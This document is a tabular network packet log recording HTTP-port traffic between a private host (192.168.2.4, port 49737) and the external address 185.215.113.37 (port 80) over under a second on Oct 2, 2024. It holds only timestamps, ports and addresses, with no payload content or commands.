Oct 2, 2024 18:19:27.581659079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581671953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581684113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581698895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581712008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581753016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581762075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581775904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581785917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581800938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581814051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581887960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581897020 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581911087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581922054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.581933975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581949949 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.581971884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582017899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582027912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582037926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582045078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582051992 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582072020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582155943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582171917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582181931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582192898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582204103 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582206964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582214117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582227945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582242966 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582262993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582335949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582369089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582422018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582431078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582448959 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582458973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582464933 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582469940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582479954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582508087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582576036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582586050 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582628012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582670927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582680941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582690001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582700014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582705975 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582735062 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582833052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582844019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582853079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582863092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582873106 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582876921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582882881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.582906961 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.582927942 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583116055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583126068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583136082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583144903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583153963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583161116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583163977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583173990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583177090 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583184004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583194017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583199978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583204031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583219051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583231926 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583529949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583539963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583549976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583560944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583570957 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583580017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583585978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583590984 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583602905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583605051 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583615065 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583623886 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583637953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583659887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583811998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583820105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583828926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583838940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583848000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583848953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583858967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583862066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583868980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583878994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.583887100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583903074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.583916903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584033966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584042072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584052086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584062099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584070921 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584079027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584081888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584104061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584116936 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584284067 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584292889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584302902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584311962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584321976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584327936 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584331036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584342003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584353924 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584357023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584367037 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584368944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584378004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584389925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584414005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584616899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584626913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584639072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584662914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584686041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584688902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584697962 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584708929 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584717989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584721088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584732056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584743977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584764004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.584953070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584963083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584976912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584986925 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584995985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.584994078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.585005999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.585016012 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.585026026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.585026026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.585036993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.585038900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.585047007 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.585053921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.585078001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.585263014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.585273027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.585283041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.585299015 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.587577105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681010008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681019068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681029081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681090117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681098938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681108952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681118011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681127071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681246996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681246996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681330919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681340933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681350946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681365967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681370974 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681390047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681416988 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681529045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681538105 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681549072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681559086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681565046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681577921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681595087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681757927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681766987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681776047 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681786060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681791067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681794882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681806087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681817055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681819916 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681826115 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681835890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.681847095 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681864023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.681876898 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.682075024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682085037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682094097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682107925 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.682123899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.682221889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682231903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682240963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682250977 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682257891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.682260036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682271004 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682280064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682286978 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.682290077 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682300091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682310104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682315111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.682322025 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682337046 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.682349920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.682785988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682795048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682806015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682815075 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682821989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.682825089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682835102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.682848930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.682874918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.683069944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683079958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683089972 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683099985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683103085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.683109045 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683119059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683120012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.683134079 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683137894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.683142900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683152914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683161974 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683166027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.683171988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683182001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.683182001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683192968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683196068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.683202982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683212996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683221102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.683223009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683233023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683248997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.683264971 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.683703899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.683743954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.727266073 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.732139111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969285011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969295979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969300985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969311953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969320059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969329119 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969337940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969362020 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969384909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969409943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969419956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969445944 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969456911 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969500065 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969508886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969517946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969527006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969533920 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969535112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969542980 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969552994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969563961 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969573021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969758034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969765902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969774961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969783068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969793081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969794035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969801903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969804049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969810963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969820023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.969820023 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969834089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.969847918 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970057964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970067024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970074892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970083952 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970092058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970101118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970101118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970102072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970105886 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970139027 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970323086 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970331907 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970340967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970349073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970355034 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970360041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970365047 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970370054 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970385075 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970395088 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970413923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970582008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970591068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970599890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970607996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970621109 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970629930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970652103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970674038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970684052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970689058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970696926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970701933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970705986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970714092 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970719099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:27.970722914 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:27.970727921 CEST	80	49737	185.215.113.37	192.168.2.4
